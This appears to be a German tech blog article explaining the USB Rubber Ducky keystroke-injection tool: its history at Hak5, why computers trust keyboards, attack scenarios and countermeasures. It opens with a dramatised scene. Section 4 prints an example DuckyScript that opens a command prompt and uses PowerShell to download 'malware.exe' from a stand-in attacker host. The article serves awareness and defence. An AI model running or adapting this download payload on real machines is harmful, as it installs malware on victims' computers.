neustes

AUS DEM BAUCH HERAUS Industrie 4.0 & Sensorik KI, Daten & Gesellschaft Technisch

Der Rubber Ducky – Wenn der USB-Stick zur Tastatur wird

1. Der Prolog – Die Szene

Los Angeles, 2011. Ein großer Konferenzraum, in dem gerade die Mittagspause begonnen hat. Die Teilnehmer strömen hinaus, um sich Kaffee zu holen oder draußen eine Zigarette zu rauchen. Auf den Tischen liegen Laptops, einige im Standby, andere noch laufend, die Bildschirme hell erleuchtet. Ein Mann in dunklem Hemd geht langsam durch die Reihen. Er trägt einen Rucksack, aus dem ein Kabel hängt – nichts Besonderes, sieht aus wie jeder andere IT-Berater hier. In der Hand hält er einen USB-Stick. Aber er steckt ihn nicht in seinen eigenen Rechner. Im Vorbeigehen, ganz beiläufig, als müsse er nur kurz etwas nachsehen, beugt er sich zu einem der Laptops. Der Stick verschwindet im Port, eine halbe Sekunde später ist er wieder draußen. Der Mann geht weiter, ohne sich umzudrehen. Keiner hat es gesehen. Keiner hat etwas bemerkt.

Drei Tage später bekommt der Besitzer des Laptops eine seltsame Nachricht von seiner Bank. Jemand hat versucht, 10.000 Euro von seinem Konto abzuheben. Zum Glück war das Limit ausgeschöpft. Er versteht die Welt nicht mehr. Sein Passwort war sicher. Sein Rechner war nie unbeaufsichtigt – dachte er. Aber eine halbe Sekunde, das reicht. Das reicht völlig.

2. Der Mensch – Der Admin, der nicht mehr tippen wollte

Die Geschichte des Rubber Ducky ist eine aus der IT-Abteilung. Kein Spion, kein Geheimagent – sondern ein genervter Administrator. Sein Name ist Darren Kitchen, Gründer der Firma Hak5 . Kitchen war es leid, immer wieder die gleichen Befehle einzutippen, wenn er Drucker konfigurierte, Netzwerkfreigaben einrichtete oder Firewall-Regeln anpasste. Es gibt Arbeiten, die muss man machen. Und es gibt Arbeiten, die machen einen wahnsinnig, weil sie sich jeden Tag wiederholen.

Also bastelte er sich ein kleines Gerät, das genau das für ihn übernahm. Ein Prototyp, der wie ein USB-Stick aussah, aber beim Einstecken automatisch die immer gleichen Tastenbefehle abfeuerte. Praktisch, dachte er. Zeitersparnis, dachte er. Es dauerte nicht lange, bis ihm klar wurde: Das Ding ist nicht nur praktisch. Es ist eine Waffe. 2011 kam der Rubber Ducky als erstes kommerzielles Keystroke-Injection-Tool auf den Markt . Kitchen hatte eine Büchse der Pandora geöffnet – aber er tat es mit offenen Augen. Er verkaufte das Gerät nur an Sicherheitsforscher und Pentester, an die „Guten“. Ob es dabei geblieben ist? Wer weiß das schon.

3. Das Problem – Die vertraute Tastatur

Das Problem, das der Rubber Ducky ausnutzt, ist so alt wie USB selbst: Dein Computer vertraut jedem Gerät, das sich als Tastatur ausgibt . Es gibt keinen Virenscan für Tastaturen. Es gibt keine Firewall zwischen dir und deiner Tastatur. Sobald der Computer eine Tastatur erkennt, lässt er sie machen. Das Betriebssystem geht davon aus, dass der Nutzer selbst gerade tippt. Und warum sollte es auch anders denken? Eine Tastatur ist ein Eingabegerät. Sie soll Befehle übermitteln. Das ist ihr Job.

Die Größe der Daten, die so übertragen werden können, ist zwar begrenzt – ein Rubber Ducky kann keine Terabyte an Daten speichern. Aber das muss er auch nicht. Er muss nur schnell genug tippen, um eine Hintertür zu öffnen. Danach kann der richtige Schadcode aus dem Internet nachgeladen werden . Der Rubber Ducky ist der Türöffner. Der Einbrecher kommt später.

4. Der Bau / Die Funktionsweise – Die getarnte Tastatur

Öffnet man einen Rubber Ducky, sieht man: Da ist kein Speicherchip für Dateien. Stattdessen sitzt auf der winzigen Platine ein leistungsstarker Mikrocontroller – ein AMTEL 32bit, um genau zu sein – und ein Slot für eine Micro-SD-Karte . Auf dieser Karte liegt das Skript, das ausgeführt werden soll. Geschrieben wird es in einer eigens dafür entwickelten Sprache: DuckyScript.

Ein solches Skript sieht etwa so aus :

text

REM Das hier ist ein Kommentar
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
STRING powershell -Command "Invoke-WebRequest -Uri 'http://boese-server.com/malware.exe' -OutFile '%TEMP%\malware.exe'"
ENTER

Übersetzt bedeutet das: Drück die Windows-Taste + R (das öffnet den Ausführen-Dialog), warte eine halbe Sekunde, tipp „cmd“ ein, drück Enter, warte eine Sekunde, starte PowerShell und lade Schadsoftware aus dem Netz nach. Das alles in weniger als fünf Sekunden. Schneller, als jeder Mensch tippen könnte.

Das Geniale – oder Teuflische – daran: Du siehst nichts. Wenn der Rubber Ducky als Tastatur erkannt wird, öffnet sich kein Fenster, das „Neue Hardware gefunden“ meldet. Der Computer tut einfach das, was er für Tastatureingaben hält. Und wenn der Angreifer clever ist, lässt er das Powershell-Fenster im Hintergrund laufen oder minimiert es gleich . Du merkst gar nicht, dass gerade jemand in deinem System herumspaziert.

5. Das Herzstück – Die Geschwindigkeit

Die eine Idee, die alles verändert, ist die Geschwindigkeit. Ein Mensch tippt vielleicht fünf Anschläge pro Sekunde. Ein Rubber Ducky schafft Hunderte. Er kann in der Zeit, die du brauchst, um „Halt, was war das?“ zu denken, schon ein komplettes Reverse-Shell-Skript installiert haben.

Es gibt zwei typische Angriffsszenarien :

Direkter Zugang: Der Angreifer hat kurzzeitig physischen Zugriff auf den Rechner. Er steckt den Ducky an, wartet ein paar Sekunden, zieht ihn wieder ab. Niemand hat etwas gesehen.

Indirekter Zugang: Der Angreifer lässt einen USB-Stick irgendwo liegen – auf dem Parkplatz, in der Kantine, im Konferenzraum. Ein neugieriger Mitarbeiter findet ihn, steckt ihn ein, um zu sehen, wem er gehört. In dem Moment, wo der Rechner den Stick einliest, ist es schon zu spät .

Und das alles funktioniert auf Windows, Mac, Linux – sogar auf gesperrten Rechnern. Ein gesperrter Bildschirm wartet schließlich auf die Eingabe des Passworts. Und wer sagt denn, dass das Passwort von einem Menschen kommen muss?

6. Das Ende – Was wurde daraus?

Der Rubber Ducky ist heute das Standardwerkzeug für jeden Pentester. Er kostet um die 50 Euro, ist kleiner als ein Feuerzeug und passt in jede Hosentasche . In der Serie „Mr. Robot“ wurde er einem ahnungslosen Opfer in die Tasche gesteckt – ein kleiner Gruß an die Eingeweihten, die wussten, was das Ding wirklich kann .

Die Hersteller haben nachgerüstet. Microsoft und Apple haben Sicherheitsmechanismen eingebaut, die die Installation unbekannter Tastaturen einschränken können . In Firmen gibt es heute Richtlinien, die USB-Ports komplett sperren oder nur bestimmte, freigegebene Geräte erlauben. Aber so richtig bekommen hat man das Problem nie. Denn das Grundprinzip – dass ein Computer seiner Tastatur vertrauen muss – lässt sich nicht ändern. Solange du tippen kannst, kann auch ein Rubber Ducky tippen.

7. Der Epilog – Was bleibt?

Was lernen wir daraus? Es ist die alte Geschichte vom Wolf im Schafspelz. Du siehst einen USB-Stick, denkst „Dateien“ – und in Wirklichkeit ist es eine Tastatur. Du siehst ein Kabel, denkst „Strom“ – und in Wirklichkeit ist es ein Spion. Die Moral von der Geschicht: Steck nichts in deinen Rechner, dessen Herkunft du nicht kennst. Der USB-Stick auf dem Parkplatz ist kein Geschenk des Himmels. Er ist eine Falle. Und die schnappt zu, lange bevor du „Halt“ sagen kannst.

Ähnliche Beiträge

Kommentar abschicken

Das hast du vielleicht verpasst